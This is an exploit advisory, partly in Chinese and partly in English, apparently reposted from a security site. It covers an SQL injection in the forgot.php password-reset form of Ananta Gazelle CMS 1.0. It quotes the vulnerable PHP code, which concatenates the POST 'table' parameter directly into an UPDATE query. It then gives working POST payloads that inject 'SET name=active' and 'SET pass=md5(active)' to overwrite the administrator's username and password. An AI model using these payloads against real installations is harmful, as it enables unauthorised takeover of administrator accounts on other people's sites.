表头: Ananta Gazelle CMS - Update Statement Sql injection
作者: hackme
下载地址: http://sourceforge.net/projects/ananta/files/stable/Gazelle 1.0 stable/Ananta_Gazelle1.0.zip/
影响版本: 1.0 stable
测试平台: backbox 2.1
 
[先为我差劲的英语致歉]
 
[+] 这个注射不允许我们读取表内容, but to do the update statement of the username and password of admin.
Since you can't enter a special chars as the apex, and then we don't change the username and password in what we want, we will copy the value of a column with default value in column username and password.
事实上我们已经:
    admin - username = 1
              - password = 1
[+] 缺陷代码分析(forgot.php):
[CODE]
if (!empty($_POST) && !isset($_POST["loginform"])) {
    // form submitted, set a new activation key for this user (however don't set the user to inactive, so no-one can block someone else's account
    $sql = "UPDATE ".$tableprefix.$_POST["table"]." SET ";
    if ($_POST["activate"] <> "") {
        $sql = $sql."activate='".$_POST["activate"]."'";
    }
    $sql = $sql." WHERE email"."='".$_POST["email"]."'";
    // www.2cto.com no control
    if (mysql_query($sql)) {
[/code]
[+] default table users columns: number,name,pass,email,activate,active,admin,joindate,showemail
风险等级：高
[+]缺陷页面: www.2cto.com /ananta/forgot.php
[+] Change admin username in "1" [POST-DATA]
email=&save=Save&table=users SET name=active where number=1--&activate=lol&location=/ananta/forgot.php
[+] Change admin password in "1" [POST-DATA]
email=v&save=Save&table=users SET pass=md5(active) where number=1--&activate=lol&location=/ananta/forgot.php
[+]...如果你想， 你就能
[+] Greetz To: MZ